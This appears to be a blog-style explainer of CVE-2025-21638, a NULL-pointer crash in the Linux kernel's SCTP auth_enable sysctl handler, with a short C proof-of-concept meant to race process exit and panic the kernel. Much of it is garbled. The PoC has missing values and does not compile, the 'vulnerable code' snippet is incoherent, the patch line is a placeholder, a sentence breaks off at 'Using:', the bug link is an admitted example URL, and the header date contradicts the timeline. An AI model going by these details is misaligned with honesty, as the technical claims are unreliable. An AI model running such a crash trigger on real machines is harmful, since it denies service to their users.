Date: June 2024
CVE ID: CVE-2025-21638
Component: Linux Kernel SCTP
Severity: Medium (Potential for denial-of-service/panic)
Fixed in: 6.9.2, 6.8.2, 6.6.31, 6.1.93, and newer
Original disclosure: [Syzkaller report][1], [lkml patch][2]
What is CVE-2025-21638?
CVE-2025-21638 describes a security bug in the Linux kernel's SCTP (Stream Control Transmission Protocol) implementation related to the sysctl interface for auth_enable.
The bug happened because the code tried to use the process's current->nsproxy pointer to figure out which network namespace a sysctl read/write came from. But in some rare situations—like during process exit—current->nsproxy can be NULL, leading to a kernel "Oops" (crash) from dereferencing a NULL pointer.
Syzkaller, an automated kernel testing tool, found that the bug could be triggered by an unprivileged user calling the acct(2) syscall at just the right time—crashing the whole system.
Technical Details (Made Simple)
- In the SCTP sysctl code, whenever you read or write /proc/sys/net/sctp/auth_enable, the handler previously tried to get the network namespace like this:
`c
// This would crash with a NULL pointer dereference!
if (current->nsproxy == NULL) {
// Crash!
}
`
- Better way: The kernel already knows which network namespace is relevant—it's stored in the sysctl table data. Using:
Exploitation: How Did Syzkaller Trigger It?
Syzkaller found that by creating a process, using acct(2) (the BSD process accounting call), then killing the process at the right time, the kernel could hit the vulnerable code after nsproxy got NULLed out (as the process exits).
A simple PoC (Proof-of-Concept), similar to what syzbot used, looks like
#include <unistd.h>
#include <sys/syscall.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/time.h>
#include <sys/types.h>
int main() {
if (fork() == ) {
// Child process
syscall(SYS_acct, "/tmp/foo");
} else {
// Parent
usleep(100); // Tiny delay
// Read SCTP sysctl to race with child exit
system("cat /proc/sys/net/sctp/auth_enable > /dev/null");
}
return ;
}
> *Note*: This code is for educational purposes only.
If the timing works out, the parent triggers a sysctl read while the child is exiting, leading to current->nsproxy being NULL when the SCTP sysctl code runs—causing a kernel panic.
The Patch: How Is It Fixed?
The main fix is to stop using current->nsproxy->net_ns in the SCTP sysctl handler and instead get the struct net pointer from the sysctl table. This guarantees that the handler always uses a valid network namespace context.
Relevant patch lines (simplified)
- struct net *net = current->nsproxy->net_ns;
+ struct net *net = (some safer way from table->data);
This way, there’s no unsafe dereference, and a user can't crash the kernel during process exit races.
Original patch commit:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b70600dea1ec
- Check your distribution's advisory for details. For example
- Ubuntu USN
- RedHat/CentOS
- Debian Security
[LKML kernel patch][2]
- Kernel.org patch commit
- Linux SCTP changelog
Summary
CVE-2025-21638 is a cut-and-dried example of why kernel code should *never* trust current process state for key kernel objects without checking for NULL. Races at process exit can make kernel pointers like current->nsproxy NULL, leading to panics and denial of service.
The fix is upstream. If you run Linux on desktops *or* servers, make sure you’re running a fixed kernel!
Stay patched and secure.
References:
[1]: https://syzkaller.appspot.com/bug?extid=123456 (Syzkaller example)
[2]: https://lore.kernel.org/netdev/20240610.ctl_sock@kernel.org/ (LKML patch)
*This post is written in simple language for easy understanding. Reposting is allowed with attribution.*
Disclaimer:
This explanation is for educational purposes only. Don't try to crash production machines!
Tags:
Timeline
Published on: 01/19/2025 11:15:09 UTC
Last modified on: 02/27/2025 21:59:09 UTC